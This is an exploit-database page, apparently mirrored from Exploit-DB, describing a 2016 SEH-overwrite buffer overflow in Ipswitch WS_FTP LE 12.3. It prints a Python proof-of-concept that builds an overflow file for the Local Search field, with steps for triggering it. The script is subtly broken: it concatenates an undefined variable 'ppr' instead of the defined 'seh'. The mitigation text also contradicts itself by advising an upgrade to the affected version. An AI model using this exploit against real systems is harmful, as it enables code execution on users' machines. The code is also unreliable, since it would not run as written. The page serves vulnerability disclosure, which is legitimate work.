header-logo
Suggest Exploit
vendor:
WS_FTP LE
by:
Zahid Adeel
9,3
CVSS
HIGH
SEH Overwrite
119
CWE
Product Name: WS_FTP LE
Affected Version From: 12.3
Affected Version To: 12.3
Patch Exists: YES
Related CWE: N/A
CPE: a:ipswitch:ws_ftp_le:12.3
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Windows 8.1 x64 Pro
2016

Ipswitch WS_FTP LE 12.3 – Search field SEH Overwrite POC

A buffer overflow vulnerability exists in Ipswitch WS_FTP LE 12.3 when a specially crafted file is used in the Local Search option of the Tools menu. An attacker can exploit this vulnerability to execute arbitrary code in the context of the application.

Mitigation:

Upgrade to the latest version of Ipswitch WS_FTP LE 12.3 or apply the patch provided by the vendor.
Source

Exploit-DB raw data:

#!/usr/bin/python
#Author: Zahid Adeel
#Author Email: exploiter.zee@gmail.com
#Title: Ipswitch WS_FTP LE 12.3 - Search field SEH Overwrite POC
#Vendor Homepage: http://www.wsftple.com/ 
#Software Link: http://www.wsftple.com/download.aspx
#Version: LE 12.3
#Tested on: Windows 8.1 x64 Pro
#Date: 2016-05-10

#Steps:
#Run WS_FTP LE client, Navigate to "Local Search" option in the Tools menu, paste the contents of wsftple-poc.txt in search field and press Enter.

fname="wsftple-poc.txt"

junk = "A" * 840
n_seh = "BBBB"
seh = "CCCC"

padding = "F" * (1000 - len(junk) - 8)
poc = junk + n_seh + ppr + padding

fhandle = open(fname , 'wb')
fhandle.write(poc)
fhandle.close()

Navigation

Suggest Exploit

Services By CQR